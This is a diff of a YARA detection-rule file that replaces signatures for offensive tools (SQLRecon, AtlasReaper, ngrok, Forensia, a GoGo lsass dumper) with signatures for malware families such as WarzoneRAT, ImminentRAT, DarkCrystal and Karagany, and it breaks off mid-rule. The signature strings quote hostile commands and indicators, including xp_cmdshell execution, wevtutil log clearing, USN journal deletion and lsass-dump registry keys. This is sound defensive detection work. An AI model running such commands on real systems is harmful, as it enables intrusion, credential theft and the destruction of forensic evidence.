-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1405-L1418"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2838-L2852"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f4bba142652aaf77e5b7c123b743cf165ae17210c39cf65b7311f7e7bd91f7e1"
+		logic_hash = "4cde21932c27fe3c08495f557b5e086b1fb668d8b5508249891828b9ed48edd4"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "dashboard.ngrok.com" ascii
-		$s2 = "go.ngrok.com/cmd/ngrok/main.go" ascii
-		$s3 = "ngrok agent" ascii
-		$s4 = "*ngrok.clientInfo" ascii
-		$s5 = "'%s'  socket: '%s'  port: %d/edges/https/{{ .EdgeID }}/routes/{{ .ID }}/webhook_" ascii
-		$s6 = "/{{ .ID }}/tunnel_sessions/{{ .ID }}/restart" ascii
+		$rf1 = "[]A\\A]A^A_" ascii
+		$rf2 = "[A\\A]A^A_]" ascii
+		$f1 = "/bin/basH" ascii fullword
+		$f2 = "/proc/seH" ascii fullword
+		$f3 = "/dev/ptsH" ascii fullword
+		$f4 = "pqrstuvwxyzabcde" ascii fullword
+		$f5 = "libnss_%s.so.%d.%d" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and ( 3 of them )
+		uint16( 0 ) == 0x457f and ( all of ( $f* ) and #rf1 > 3 and #rf2 > 3 )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Sqlrecon : FILE
+rule DITEKSHEN_MALWARE_Win_Itranslatorexe : FILE
 {
 	meta:
-		description = "Detects SQLRecon C# MS-SQL toolkit designed for offensive reconnaissance and post-exploitation"
+		description = "Detects iTranslator EXE payload"
 		author = "ditekSHen"
-		id = "ec91285b-690d-5fd3-b0fc-f8d72cbb7e15"
+		id = "763e8fa4-cf5c-54bc-9310-4e4171bf5a71"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1420-L1436"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2854-L2874"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "784dbc518cf9492557c9b3536256c4a9b03e4536cf7cee7e764b8009dd4686bb"
+		logic_hash = "3c796d58cdf2d4dc4c838d05fb862640c7f9de6c7e8ebb5fb0002821354208d9"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.iTranslator_EXE"
 
 	strings:
-		$s1 = "ConvertDLLToSQLBytes" ascii
-		$s2 = "\\SQLRecon.pdb" ascii
-		$s3 = "GetAllSQLServerInfo" ascii
-		$s4 = "<GetMSSQLSPNs>b__" ascii
-		$s5 = "select 1; exec master..xp_cmdshell" wide
-		$s6 = "-> Command Execution" wide
-		$s7 = ";EXEC dbo.sp_add_jobstep @job_name =" wide
-		$s8 = "EXEC sp_drop_trusted_assembly 0x" wide
-		$s9 = "(&(sAMAccountType=805306368)(servicePrincipalName=MSSQL*))" wide
+		$s1 = "\\itranslator\\wintrans.exe" fullword wide
+		$s2 = "\\SuperX\\SuperX\\Obj\\Release\\SharpX.pdb" fullword ascii
+		$s3 = "\\itranslator\\itranslator.dll" fullword ascii
+		$s4 = ":Intoskrnl.exe" fullword ascii
+		$s5 = "InjectDrv.sys" fullword ascii
+		$s6 = "SharpX.dll" fullword wide
+		$s7 = "GetMicrosoftEdgeProcessId" ascii
+		$s8 = ".php?type=is&ch=" ascii
+		$s9 = ".php?uid=" ascii
+		$s10 = "&mc=" fullword ascii
+		$s11 = "&os=" fullword ascii
+		$s12 = "&x=32" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and 8 of ( $s* )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Atlasreaper : FILE
+rule DITEKSHEN_MALWARE_Win_Itranslatordll : FILE
 {
 	meta:
-		description = "Detects AtlasReaper command-line tool for Confluence and Jira reconnaissance, credential farming and social engineering"
+		description = "Detects iTranslator DLL payload"
 		author = "ditekSHen"
-		id = "a0b4e134-bb05-5cc3-af71-516a0407aa1b"
+		id = "df05da78-3626-5eb5-81a2-a93fba844484"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1438-L1453"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2876-L2892"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4a0436d5c3f1609d23b2b919bebdc56a7fd63e81b99e72dcda1022487cb88240"
+		logic_hash = "ca0479efd241058f358553b6382a1987a5b4c069965f4adb88cd2f3fc4bef21a"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.iTranslator_DLL"
 
 	strings:
-		$s1 = "/((?:A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})/" fullword wide
-		$s2 = "/rest/api/3/search?jql=" fullword wide
-		$s3 = "attachments+IS+NOT+EMPTY&fields=attachment,summary,status" fullword wide
-		$s4 = "<ParseJira>b__" ascii
-		$s5 = "<Atlas_Doc_Format>k__" ascii
-		$s6 = "<ParseConfluence>b__" ascii
-		$s7 = "AtlasReaper_ProcessedByFody" fullword ascii
-		$s8 = /AtlasReaper\.(Jira|Confluence)/ fullword ascii
+		$d1 = "system32\\drivers\\%S.sys" fullword wide
+		$d2 = "\\windows\\system32\\winlogon.exe" fullword ascii
+		$d3 = "\\Registry\\Machine\\SYSTEM\\ControlSet001\\services\\%s" fullword wide
+		$d4 = "\\Registry\\Machine\\SYSTEM\\ControlSet001\\services\\webssx" fullword wide
+		$d5 = "\\Device\\CtrlSM" fullword wide
+		$d6 = "\\DosDevices\\CtrlSM" fullword wide
+		$d7 = "\\driver_wfp\\CbFlt\\Bin\\CbFlt.pdb" ascii
+		$d8 = ".php" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Ngroksharp : FILE
+rule DITEKSHEN_MALWWARE_Win_Octopus : FILE
 {
 	meta:
-		description = "Detects NgrokSharp .NET library for Ngrok"
+		description = "Detects Octopus trojan payload"
 		author = "ditekSHen"
-		id = "7c335021-4afd-5878-83c3-9bb2c81f3586"
+		id = "eb092e23-864f-52f3-bfa4-7e3c616d3984"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1455-L1471"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2894-L2917"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c60637177114d369af9c3e96689811845ce1c1dfde8f7f971c4de21439564b4b"
+		logic_hash = "012b75c94be3021dbcc5b8e8bd62f807c9aa8bc0df94f830a5294aaf0d21b9fc"
 		score = 75
-		quality = 50
+		quality = 23
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.Octopus"
 
 	strings:
-		$x1 = "NgrokSharp" fullword wide
-		$x2 = "/entvex/NgrokSharp" ascii
-		$s1 = "start --none -region" wide
-		$s2 = "startTunnelDto" fullword wide
-		$s3 = "/tunnels/" fullword wide
-		$s4 = "<StartNgrok" ascii
-		$s5 = "INgrokManager" ascii
-		$s6 = "_tunnel_name" ascii
-		$s7 = "_ngrokDownloadUrl" ascii
+		$s1 = "\\Mozilla\\Firefox\\Profiles\\" fullword wide
+		$s2 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword wide
+		$s3 = "\\wbem\\WMIC.exe" fullword wide
+		$s4 = ".profiles.ini" fullword wide
+		$s5 = "PushEBP_" ascii
+		$s6 = "MovEBP_ESP_" ascii
+		$s7 = "Embarcadero Delphi for Win32 compiler" ascii
+		$s8 = "TempWmicBatchFile.bat" fullword wide
+		$wq1 = "computersystem get Name /format:list" wide
+		$wq2 = "os get installdate /format:list" wide
+		$wq3 = "get serialnumber /format:list" wide
+		$wq4 = "\\\\\\\\.\\\\PHYSICALDRIVE" wide
+		$wq5 = "path CIM_LogicalDiskBasedOnPartition" wide
+		$wq6 = "get Antecedent,Dependent" wide
+		$wq7 = "path win32_physicalmedia" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 4 of ( $* ) )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) and 5 of ( $wq* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Ngrokgo : FILE
+rule DITEKSHEN_MALWARE_Win_Caspertroy : FILE
 {
 	meta:
-		description = "Detects Go implementation variant for Ngrok"
+		description = "Detects CasperTroy payload"
 		author = "ditekSHen"
-		id = "b11f67c5-846d-57b2-8edc-521b2dc77503"
+		id = "822c3231-60ba-5e60-8df8-06dea80b318a"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1473-L1488"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2919-L2931"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4ec151661e3af922aba202c68392a2af17e2c4ed25a71a0b5aacc13fbfcc5c53"
+		logic_hash = "ce070b1e6279ef9fa47f84da7c5166cd93b3e7a0f95541ae14c048b2af9bc431"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "/codegangsta/inject" fullword wide
-		$s2 = "go.ngrok.com/" ascii
-		$s3 = "GetIsNgrokDomain" ascii
-		$s4 = "GetNgrokMetering" ascii
-		$s5 = "*cli.ngrokService" ascii
-		$s6 = "GetAllowNgrokLink" ascii
-		$s7 = "ngrok {{.Name}}{{if .Flags}}" ascii
-		$s8 = "github.com/nikolay-ngrok/" ascii
+		$s1 = "DllTroy.dll" fullword ascii
+		$s2 = "Content-Disposition: form-data; name=\"image\"; filename=\"title.gif\"" fullword ascii
+		$s3 = "Content-Disposition: form-data; name=\"COOKIE_ID\"" fullword ascii
+		$s4 = "Content-Disposition: form-data; name=\"PHP_SESS_ID\"" fullword ascii
+		$s5 = "Content-Disposition: form-data; name=\"SESS_ID\"" fullword ascii
 
 	condition:
 		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_INDICATOR_Tool_Forensia : FILE
+rule DITEKSHEN_MALWARE_Win_Rasftuby : FILE
 {
 	meta:
-		description = "Detects Forensia anti-forensics tool used for erasing footprints"
+		description = "Detects Rasftuby/DarkCrystal"
 		author = "ditekSHen"
-		id = "bcd05c2e-7ddd-5ce7-a6a7-0659bed38744"
+		id = "908624a8-0068-5512-a5d0-77ce1f4efd80"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1490-L1523"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2933-L2950"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7147eee62df10cd8a6c00ec80c4d1bdb8234a181dd6af81d0580d847f05bd0b6"
+		logic_hash = "b769c1986d23173cf8a8a3c8a14d388a7c0327e46d936fc97c449dc55f2a5575"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.DarkCrystal.RAT-Rasftuby"
 
 	strings:
-		$c1 = "for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"" ascii
-		$c2 = "del /F /Q C:\\Windows\\Prefetch\\*" ascii
-		$c3 = "del C:\\Windows\\AppCompat\\Programs\\RecentFileCache.bcf" ascii
-		$c4 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\*" ascii
-		$c5 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" ascii
-		$c6 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" ascii
-		$c7 = "fsutil.exe usn deletejournal /D C:" ascii
-		$r1 = "\\Memory Management\\PrefetchParameters" wide
-		$r2 = "\\Explorer\\Advanced" wide
-		$r3 = "\\Services\\EventLog" wide
-		$r4 = "\\Shell\\BagMRU" wide
-		$r5 = "\\Control\\FileSystem" wide
-		$r6 = "\\Setup\\VC" wide
-		$s1 = "[LOG] - %s" wide
-		$s2 = "\\forensia\\regedit.hpp" wide
-		$s3 = "NtfsDisableLastAccessUpdate" wide
-		$s4 = "Melting The Executable" wide
-		$s5 = "Sysmon Unloader" wide
-		$s6 = "Rundll32.exe apphelp.dll,ShimFlushCache" ascii
-		$s7 = "\\Debug\\forensia.pdb" ascii
-		$s8 = { 55 00 00 00 aa 00 00 00 92 49 24 00 49 24 92 00
-                24 92 49 00 00 00 00 00 11 00 00 00 22 00 00 00
-                33 00 00 00 44 00 00 00 66 00 00 00 88 00 00 00
-                99 00 00 00 bb 00 00 00 cc 00 00 00 dd 00 00 00
-                ee 00 00 00 ff 00 00 00 6d b6 db 00 b6 db 6d 00
-                db 6d b6 }
+		$s1 = "/DCRS/main.php?data=active" fullword ascii wide
+		$s2 = "/socket.php?type=__ds_" ascii wide
+		$s3 = "/uploader.php" fullword ascii wide
+		$s4 = "del \\\"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\System.lnk\\\"" fullword ascii wide
+		$s5 = "Host:{0},Port:{1},User:{2},Pass:{3}<STR>" fullword ascii wide
+		$s6 = "keyloggerstart_status" fullword ascii wide
+		$s7 = "keyloggerstop_status" fullword ascii wide
+		$s8 = "[PRINT SCREEN]" fullword ascii wide
+		$s9 = "DCS.Internal" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 4 of ( $c* ) and 2 of ( $r* ) ) or ( 4 of ( $r* ) and 2 of ( $c* ) ) or 6 of ( $s* ) or ( 3 of ( $s* ) and 2 of ( $r* ) and 1 of ( $c* ) ) )
+		uint16( 0 ) == 0x5a4d and 5 of ( $s* )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Dogzproxy : FILE
+rule DITEKSHEN_MALWARE_Win_Protonbot : FILE
 {
 	meta:
-		description = "Detects Dogz proxy tool"
+		description = "Detects ProtonBot loader"
 		author = "ditekSHen"
-		id = "de2a8d26-0e8e-5999-baca-1e43933af866"
+		id = "b0d08378-0297-5e70-99f1-1dc0fec6fa01"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1525-L1537"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2952-L2969"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "575cfed9cb7979216fd8fd2a05efe5dfece3a9120b4f185c015918337829ed63"
+		logic_hash = "b511dfd47109d36ffc7fcb23b49779e1164d50a28061ab724d7a2c744ac23ac8"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.ProtonBot"
 
 	strings:
-		$s1 = "LOGONSERVER=" fullword wide
-		$s2 = "DOGZ_E_" ascii
-		$s3 = "got handshake_id=%d" ascii
-		$s4 = "responser send connect ack" ascii
-		$s5 = "dogz " ascii
+		$x1 = "\\PROTON\\Release\\build.pdb" ascii
+		$x2 = "\\proton\\proton bot\\json.hpp" wide
+		$x3 = "proton bot" ascii wide
+		$s1 = "endptr == token_buffer.data() + token_buffer.size()" fullword wide
+		$s2 = "ranges.size() == 2 or ranges.size() == 4 or ranges.size() == 6" fullword wide
+		$s3 = "ref_stack.back()->is_array() or ref_stack.back()->is_object()" fullword wide
+		$s4 = "ktmw32.dll" fullword ascii
+		$s5 = "@detail@nlohmann@@" ascii
+		$s6 = "urlmon.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( all of ( $s* ) and 1 of ( $x* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Fastreverseproxy : FILE
+rule DITEKSHEN_MALWARE_Win_Imminentrat : FILE
 {
 	meta:
-		description = "Detects Fast Reverse Proxy (FRP) tool"
+		description = "Detects ImminentRAT"
 		author = "ditekSHen"
-		id = "d643cc38-a96c-5353-bb46-ca46ea740e3b"
+		id = "99831b32-d8a0-5814-bf41-491f607ee825"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1539-L1555"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2971-L2994"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c26d9e8833c7055a03a446eb983c7f70f1f18669d009ebc204dda3f0bb6048f7"
+		logic_hash = "f959fd28e818b17c962fcd5bb99fa5ac0058f22494950e0200f139703f3e756a"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "<title>frp client admin UI</title>" ascii
-		$x2 = "https://github.com/fatedier/frp" ascii
-		$s1 = ").SetLogin" ascii
-		$s2 = ").SetPing" ascii
-		$s3 = ").SetNewWorkConn" ascii
-		$s4 = ").ServeHTTP" ascii
-		$s5 = ").Middleware" ascii
-		$s6 = "frpc proxy config error:" ascii
-		$s7 = "frpc sudp visitor proxy is close" ascii
+		$x1 = "abuse@imminentmethods.net" ascii
+		$x2 = "Imminent-Monitor-" ascii
+		$x3 = "AddressChangeListener" fullword ascii
+		$x4 = "SevenZipHelper" fullword ascii
+		$x5 = "WrapNonExceptionThrows" fullword ascii
+		$s1 = "_ENABLE_PROFILING" wide
+		$s2 = "Anti-Virus: {0}" wide
+		$s3 = "File downloaded & executed" wide
+		$s4 = "Chat - You are speaking with" wide
+		$s5 = "\\Imminent\\Plugins" wide
+		$s6 = "\\Imminent\\Path.dat" wide
+		$s7 = "\\Imminent\\Geo.dat" wide
+		$s8 = "DisableTaskManager = {0}" wide
+		$s9 = "This client is already mining" wide
+		$s10 = "Couldn't get AV!" wide
+		$s11 = "Couldn't get FW!" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or ( all of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $x* ) or 5 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Gogoscan : FILE
+rule DITEKSHEN_MALWARE_Win_Warzonerat : FILE
 {
 	meta:
-		description = "Detects GoGo scan tool"
+		description = "Detects AveMaria/WarzoneRAT"
 		author = "ditekSHen"
-		id = "c24ede04-2971-55f8-8b60-ec3bdca844d7"
+		id = "4f3df696-280c-5f2b-9511-8cc7c9dff1d6"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1557-L1571"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2996-L3011"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c9fbc98a28c74bf920f5f7d62713834d18b33b5c65483a1bd42e4555764c8346"
+		logic_hash = "1af8b0f90b0de3287499082a6d6d9da6ed62a3110018e0c0f7149353693060b2"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "(conn) (scan  (scan) MB in  Value>" ascii
-		$s2 = "sweep sysmontargettelnet" ascii
-		$s3 = "%d bytes(?i) (.*SESS.*?ID)([a-z0-9])([A-Z]+)" ascii
-		$s4 = "prepareForSweep" ascii
-		$s5 = "Scanned %s with %d ports, found %d" ascii
-		$s6 = "/chainreactors/gogo/" ascii
-		$s7 = "Starting task %s ,total ports: %d , mod: %s" ascii
+		$s1 = "RDPClip" fullword wide
+		$s2 = "Grabber" fullword wide
+		$s3 = "Ave_Maria Stealer OpenSource" wide
+		$s4 = "\\MidgetPorn\\workspace\\MsgBox.exe" wide
+		$s5 = "@\\cmd.exe" wide
+		$s6 = "/n:%temp%\\ellocnak.xml" wide
+		$s7 = "Hey I'm Admin" wide
+		$s8 = "warzone160" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and 5 of ( $s* )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Gogoprocdump : FILE
+rule DITEKSHEN_MALWARE_Win_Karaganycore : FILE
 {
 	meta:
-		description = "Detects GoGo (lsass) process dump tool"
+		description = "Detects Karagany/xFrost core plugin"
 		author = "ditekSHen"
-		id = "f92845c6-f8ae-50d0-97ea-cfa72051c2de"
+		id = "c066805b-9373-5524-aff9-d16cd59f5a24"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1573-L1586"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3013-L3027"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f410882e4c6c8b65e7d3c192cf94bf99d61cf54dc21d80cdf17193b34752c576"
+		logic_hash = "cde96ac6477fda1312ce4f7532018c9f11df7d39c40155d10bdde0e3d84c6d57"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "C:\\temp" ascii
-		$s2 = "gogo" fullword ascii
-		$s3 = "/DumpLsass-master/SilentProcessExit/" ascii
-		$s4 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zone" ascii
-		$s5 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe" ascii
-		$s6 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\lsass.exe" ascii
+		$s1 = "127.0.0.1" fullword ascii
+		$s2 = "port" fullword ascii
+		$s3 = "C:\\Windows\\System32\\Kernel32.dll" fullword ascii
+		$s4 = "kernel32.dll" fullword ascii
+		$s5 = "http" ascii
+		$s6 = "Move" fullword ascii
+		$s7 = "<supportedOS Id=\"{" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Fscan : FILE
+rule DITEKSHEN_MALWARE_Win_Karaganykeylogger : FILE
 {
 	meta:
-		description = "Detects GoGo scan tool"
+		description = "Detects Karagany/xFrost keylogger plugin"
 		author = "ditekSHen"
-		id = "3bf73853-15c1-54f7-866a-6a7632e39f19"
+		id = "dd14ede0-7132-5b7f-872a-d96d5275a8e4"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1588-L1602"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3029-L3041"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b107eb767454c4c084a7237c107c8414bdb03c324902769ac544c5903e346e17"
+		logic_hash = "7f1f5b2ca67e62380c8a8095fed4a4fd76d7bc15c9fe2d76e780ad85f886ef7b"
 		score = 75
-		quality = 75
+		quality = 23
 		tags = "FILE"
 
 	strings:
-		$s1 = "fscan version:" ascii
-		$s2 = "Citrix-ConfProxyCitrix-MetaframeCitrix-NetScalerCitrix-XenServerCitrix_Netscaler" ascii
-		$s3 = "(AkamaiGHost)(DESCRIPTION=(Typecho</a>)(^.+)([0-9]+)(confluence.)(dotDefender)" ascii
-		$s4 = "/fscan/" ascii
-		$s5 = "WebScan.CheckDatas" ascii
-		$s6 = "'Exploit.Test" ascii
-		$s7 = "rules:" ascii
+		$s1 = "__klg__" fullword wide
+		$s2 = "__klgkillsoft__" fullword wide
+		$s3 = "CLIPBOARD_PASTE" wide
+		$s4 = "%s\\k%d.txt" wide
+		$s5 = "\\Update\\Tmp" wide
 
 	condition:
 		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_BURTNCIGAR : FILE
+rule DITEKSHEN_MALWARE_Win_Karaganyscreenutil : FILE
 {
 	meta:
-		description = "Detects BURNTCIGAR a utility which terminates processes associated with endpoint security software"
+		description = "Detects Karagany/xFrost ScreenUtil module"
 		author = "ditekSHen"
-		id = "b5260d7e-07ac-5633-b450-e2124cbba65b"
+		id = "5eab1bb9-a433-54e6-963b-4aca863dc73f"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1604-L1616"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3043-L3055"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4977332a0b20b300a5fc34f0f8d56221f55b66783853306d803e91701cb7e6ec"
+		logic_hash = "d10230d94adfdddd604e2569ae3323efa1d5722647b9c704fceefe9446ccebd1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.TOOL.BURNTCIGAR"
 
 	strings:
-		$s1 = "Kill PID =" ascii
-		$s2 = "CreateFile Error =" ascii
-		$s3 = "\\KillAV" ascii
-		$s4 = "DeviceIoControl" ascii
+		$s1 = "__pic__" ascii wide
+		$s2 = "__pickill__" ascii wide
+		$s3 = "\\picture.png" fullword wide
+		$s4 = "%d.jpg" wide
+		$s5 = "\\Update\\Tmp" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Pplblade : FILE
+rule DITEKSHEN_MALWARE_Win_Karaganylistrix : FILE
 {
 	meta:
-		description = "Detects PPLBlade Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk"
+		description = "Detects Karagany/xFrost Listrix module"
 		author = "ditekSHen"
-		id = "60c9b036-51a0-5e08-83de-1f69f62245c3"
+		id = "837cc9e7-eefb-530c-854b-51bb4444ae78"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1634-L1658"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3057-L3069"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "da21402b07fcd0358ba630e48ab35956cb7ed8c12836a339c85b2ee5e414543e"
+		logic_hash = "02216061dbe93b7bea108f4b27c052d87c14cfe9395c6c5d4eed46ed7819e7ae"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
